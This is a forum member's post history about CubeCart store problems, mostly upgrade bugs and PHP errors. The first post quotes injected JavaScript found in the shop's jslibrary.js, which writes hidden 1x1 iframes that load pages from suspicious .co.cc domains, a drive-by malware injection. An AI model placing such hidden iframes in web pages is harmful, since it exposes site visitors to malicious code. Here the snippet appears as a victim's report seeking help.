Jump to content

Leo Clark

Member
  • Posts

    45
  • Joined

  • Last visited

Everything posted by Leo Clark

  1. Dear friends, I believe my store was hacked. I found this piece of code on my jslibrary.js document.write("<iframe src='http://osufoyysdf.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAQMHBgINBQ==' width='1' height='1' frameborder='0'></iframe>"); document.write("<iframe src='http://dedede4.co.cc/notfound/inkujrgzk.php?n=setup2432' width='1' height='1' frameborder='0'></iframe>"); I restored the original file and Avast is calm now. Anything I should do? Does it help to change permissions to 7777? And it it ok to to that? Thanks so much!! Leo
  2. I 've just installed a brand new store from scratch (3.0.20) and I have the exact same problem: Warning: MagpieRSS: Failed to fetch http://forums.cubecart.com/index.php?act=rssout&id=1 (HTTP Response: HTTP/1.1 404 Not Found ) in /classes/rss_fetch.inc on line 238 Warning: Invalid argument supplied for foreach() in /admin/index.php on line 152 Looks like no one has a solution yet... Cheers!
  3. hi everyone, did not know where to go, so i just wanted to say that the Read Me.txt file has no carriage returns (?) it opens up in one straight line on the notepad. anyway, all the best for you guys. cheers! leo
  4. thanks a lot man!!!! you made my day!! cheers! :cat:
  5. hi there, a lot of people going through this: http://www.cubecart.com/site/forums/index....showtopic=22203 i now regret that i updated to 0.12 good luck.
  6. hi there, i was browsing and found more people with the same problem. and yours is definately the same as mine. and i agree. the problem is version .12. i have 3 stores. one on .10 (perfect) and 2 other running .12 and i cannot edit a product. it is absurd! a moderator has already confirmed the problem as serious: http://www.cubecart.com/site/forums/index....showtopic=21358 hope it is fixed soon.
  7. i am thinking of re-installing the store. it is not possible to work with NON editable products.
  8. I have just tryed this and im still going around in circles. Anybody has any idea ?? I had the same problem and also found a fix. I just removed the / from the beginning of the of the modules in fhe following folder modules/gateway/Print_Order_Form/orderForm.php. Original Code:- $formAction = $GLOBALS['rootRel']."/modules/gateway/Print_Order_Form/orderForm.php"; Change To:- $formAction = $GLOBALS['rootRel']."modules/gateway/Print_Order_Form/orderForm.php"; It worked for me, maybe it will help other's Yes!! It did work. Thanks Ian
  9. thanks anzuk. i use legend. so, even an original skin? i will try it and post here later. leo i finally realilzed something that may be obvious. what happens is that the email sent to the store owner goes without any customer information. it only shows the itens. i have this problem since my first install. i even thought to suggest a more complete email to the store owner. now i will have to check all the variables to find out which one is missing empty/invalid. lets see.
  10. Thanks Brivtech, I am sorry to hear that this is a real problem. I hope it is solved soon.
  11. thanks anzuk. i use legend. so, even an original skin? i will try it and post here later. leo
  12. I have group discount from goober and company details by semperfi. And one detail: I already had a picture AND a thumbnail. when I changed the stock and hit the edit button then I got the error and the thumbnail disapeared.
  13. thanks robix, i understood what you said, but i dont believe i changed the language. i will check the %s. i will let you know. cheers.
  14. Hey Brian, I get the same error. Exact same error message, and it will not let me update my products anymore. Works fine on 3.0.10, but does not on 3.0.12. Anyone knows about this? Thanks. Leo
  15. hi there, i am getting this warning Warning: sprintf(): Too few arguments in /home/creativebrazil/www/includes/content/gateway.inc.php on line 253 everytime i hit on continue to select the paypal payment. below is the code: ################################################################################ ## ## Admin E-Mail Fix by Sir William -- http://www.swscripts.com/ // notify shop owner of new order if($basket['mailSent']==0){ // send only if not sent already for current order number include("classes/htmlMimeMail.php"); $mail = new htmlMimeMail(); if($basket['shipCost']>0){ $emailShipCost = $basket['shipCost']; } else { $emailShipCost = "0.00"; } $text = sprintf($lang['front']['gateway']['admin_email_body_1'], $cart_order_id, formatTime(time()), $ccUserData[0]['title']." ".$ccUserData[0]['firstName']." ".$ccUserData[0]['lastName'], $ccUserData[0]['email'], priceFormat($basket['subTotal']), priceFormat($emailShipCost), priceFormat($basket['tax']), priceFormat($basket['grandTotal']), $ccUserData[0]['title']." ".$ccUserData[0]['firstName']." ".$ccUserData[0]['lastName'], $ccUserData[0]['add_1'], $ccUserData[0]['add_2'], $ccUserData[0]['town'], $ccUserData[0]['county'], $ccUserData[0]['postcode'], countryName($ccUserData[0]['country']), $basket['delInf']['title']." ".$basket['delInf']['firstName']." ".$basket['delInf']['lastName'], $basket['delInf']['add_1'], $basket['delInf']['add_2'], $basket['delInf']['town'], $basket['delInf']['county'], $basket['delInf']['postcode'], countryName($basket['delInf']['country']), str_replace("_"," ",$_POST['gateway']), str_replace("_"," ",$basket['shipMethod'])); if(!empty($_POST['customer_comments'])){ $text .= sprintf($lang['front']['gateway']['admin_email_body_2'], $_POST['customer_comments']); } $text .= $lang['front']['gateway']['admin_email_body_3']; $text .= $prodtext; $mail->setText($text); // uncomment the following two lines to have the order message come from customer // $mail->setReturnPath($ccUserData[0]['email']); // $mail->setFrom($ccUserData[0]['firstName']." ".$ccUserData[0]['lastName'].' <'.$ccUserData[0]['email'].'>'); // uncomment the following two lines to have the order message come from store admin $mail->setReturnPath($config['masterEmail']); $mail->setFrom($config['masterName'].' <'.$config['masterEmail'].'>'); $mail->setSubject($lang['front']['gateway']['newOrderSubj'].$cart_order_id); $mail->setHeader('X-Mailer', 'CubeCart Mailer'); $send = $mail->send(array($config['masterEmail']), $config['mailMethod']); } ################################################################################ ## i searched the forum and could not find the problem listed. please help. thanks! leo
×
×
  • Create New...